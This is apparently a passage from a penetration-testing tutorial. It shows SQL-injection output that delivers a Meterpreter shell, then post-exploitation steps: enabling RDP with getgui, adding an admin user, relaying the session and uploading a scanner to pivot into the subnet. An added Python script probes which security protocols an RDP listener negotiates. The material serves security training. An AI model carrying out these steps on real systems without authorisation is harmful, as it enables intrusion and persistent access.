
Simulated Penetration Test


[+] Prepping the payload for delivery. [+]
Sending chunk 1 of 8, this may take a bit...
Sending chunk 2 of 8, this may take a bit...

. . . SNIP . . .

Using H2B Bypass to convert our Payload to Binary..
Running cleanup before launching the payload....
[+] Launching the PAYLOAD!! This may take up to two or three minutes. [+]

This should look familiar. We've essentially attacked the web application through Fast-Track and exploited it via SQL injection. We used a stored procedure on the database server together with the binary-to-hex conversion technique (the H2B bypass shown in the output above) to deliver a full-fledged Meterpreter shell.

Post Exploitation

At this point, we should have a Meterpreter console running in the background, so we can begin to scan the target's subnet for other live systems. To do this, we'll upload a port scanner to the target and run it from the Windows machine.

First, download the scanner as a Windows executable and save it locally; we'll be uploading this to the target. Next, we'll connect to the target via Microsoft's Remote Desktop Protocol (RDP), a built-in graphical remote administration protocol that lets you interact with the Windows desktop as if you were sitting in front of the remote machine. Rather than connect to the target's RDP port (TCP 3389) directly, we'll use the getgui Meterpreter script from our existing Meterpreter session. It enables Remote Desktop on the target and creates a relay: local port 8080 on our attacking machine is forwarded through the Meterpreter session to the target's RDP listener, so the RDP connection travels inside the channel we already control. The same script can add a new administrative user to the system with its -u and -p options; the command shown below enables RDP and sets up the relay only, so run getgui with -u and -p (or use credentials you already hold) before trying to log in.

We enter rdesktop localhost:8080 from Back|Track's command line, so we can log into the system with the newly created user account. We then use Meterpreter to upload the scanner to the target. Our goal is to install it on the compromised Windows target and use the system as a staging ground for further attacks. Alternatively, you could route traffic through the Meterpreter session and run one of Metasploit's port-scanning auxiliary modules against the subnet directly from Metasploit. The choice is a matter of personal preference and needs.

meterpreter > run getgui -e -f 8080

[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] Starting the port forwarding at local port 8080
[*] Local TCP relay created: <->
meterpreter >
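Before handing the relay to rdesktop it is worth confirming that whatever answers on localhost:8080 really is a Terminal Services listener, and finding out what it will negotiate. The script below is an added example for this page; it is not from the book and not part of Metasploit or getgui. It sends the first RDP round trip (an X.224 Connection Request carrying an RDP_NEG_REQ, as specified in MS-RDPBCGR) and decodes the Connection Confirm: whether the server chose standard RDP security, TLS or CredSSP, whether it refused with an RDP_NEG_FAILURE (for example HYBRID_REQUIRED_BY_SERVER when Network Level Authentication is enforced, which older rdesktop builds cannot satisfy), or whether it answered with a bare Connection Confirm the way Windows 2003/XP-era Terminal Services do. The relay address 127.0.0.1:8080 and all function names are assumptions; the sample replies in the comments are constructed, not captured.

```python
import socket
import struct

# X.224 TPDU codes (high nibble) exchanged in the first RDP round trip.
X224_CONNECTION_REQUEST = 0xE0
X224_CONNECTION_CONFIRM = 0xD0

# RDP negotiation structures that ride inside the X.224 PDUs
# (MS-RDPBCGR 2.2.1.1.1, 2.2.1.2.1 and 2.2.1.2.2).
TYPE_RDP_NEG_REQ = 0x01
TYPE_RDP_NEG_RSP = 0x02
TYPE_RDP_NEG_FAILURE = 0x03

# requestedProtocols / selectedProtocol flags.
PROTOCOL_RDP = 0x00000000     # standard RDP security, no TLS
PROTOCOL_SSL = 0x00000001     # TLS
PROTOCOL_HYBRID = 0x00000002  # CredSSP (Network Level Authentication)

FAILURE_CODES = {
    1: "SSL_REQUIRED_BY_SERVER",
    2: "SSL_NOT_ALLOWED_BY_SERVER",
    3: "SSL_CERT_NOT_ON_SERVER",
    4: "INCONSISTENT_FLAGS",
    5: "HYBRID_REQUIRED_BY_SERVER",
    6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}


def build_connection_request(requested_protocols=PROTOCOL_SSL | PROTOCOL_HYBRID):
    """TPKT-framed X.224 Connection Request carrying an RDP_NEG_REQ."""
    # RDP_NEG_REQ: type, flags, length (always 8), requestedProtocols; little-endian.
    neg_req = struct.pack("<BBHI", TYPE_RDP_NEG_REQ, 0, 8, requested_protocols)
    # X.224 CR fixed part: code, DST-REF, SRC-REF, class option (all zero here).
    x224 = struct.pack(">BHHB", X224_CONNECTION_REQUEST, 0, 0, 0) + neg_req
    body = bytes([len(x224)]) + x224            # LI counts the bytes after itself
    return struct.pack(">BBH", 3, 0, 4 + len(body)) + body   # TPKT: version 3, length


def parse_connection_confirm(data):
    """Interpret the server's X.224 Connection Confirm.

    Returns {'selected_protocol', 'failure', 'legacy'}: the protocol the server
    chose, the RDP_NEG_FAILURE name if it refused, and legacy=True when the
    reply carries no RDP_NEG data at all (Windows 2003/XP-era Terminal Services).
    """
    if len(data) < 11 or data[0] != 3:
        raise ValueError("not a TPKT frame")
    tpkt_len = struct.unpack(">H", data[2:4])[0]
    if tpkt_len != len(data):
        raise ValueError("TPKT says %d bytes, got %d" % (tpkt_len, len(data)))
    li = data[4]
    if (data[5] & 0xF0) != X224_CONNECTION_CONFIRM:
        raise ValueError("X.224 TPDU 0x%02x is not a Connection Confirm" % data[5])
    user_data = data[11:5 + li]                 # bytes after the 6-byte fixed part
    result = {"selected_protocol": None, "failure": None, "legacy": False}
    if len(user_data) < 8:
        # Constructed legacy reply: 03 00 00 0b 06 d0 00 00 12 34 00
        result["legacy"] = True
        return result
    neg_type, _flags, neg_len, value = struct.unpack("<BBHI", user_data[:8])
    if neg_len != 8:
        raise ValueError("bad RDP_NEG length %d" % neg_len)
    if neg_type == TYPE_RDP_NEG_RSP:
        result["selected_protocol"] = value     # e.g. 01 00 00 00 -> TLS chosen
    elif neg_type == TYPE_RDP_NEG_FAILURE:
        result["failure"] = FAILURE_CODES.get(value, "UNKNOWN_%d" % value)
    else:
        raise ValueError("unexpected RDP_NEG type 0x%02x" % neg_type)
    return result


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed after %d of %d bytes" % (len(buf), n))
        buf += chunk
    return buf


def probe_rdp(host, port, timeout=5.0):
    """Send one Connection Request to host:port and parse whatever answers."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_connection_request())
        head = _recv_exact(s, 4)
        if head[0] != 3:
            raise ValueError("reply is not TPKT; is something other than RDP listening?")
        total = struct.unpack(">H", head[2:4])[0]
        return parse_connection_confirm(head + _recv_exact(s, total - 4))


if __name__ == "__main__":
    # The relay getgui created on the attacking machine (assumed address and port).
    print(probe_rdp("127.0.0.1", 8080))
```

Run it after getgui reports the relay is up; a ConnectionError or a non-TPKT reply means the forward is not reaching a Terminal Services listener, while a HYBRID_REQUIRED_BY_SERVER failure tells you in advance that a plain rdesktop login will be rejected. The same probe works against any address the later subnet scan turns up, since nothing in it depends on the Meterpreter forward.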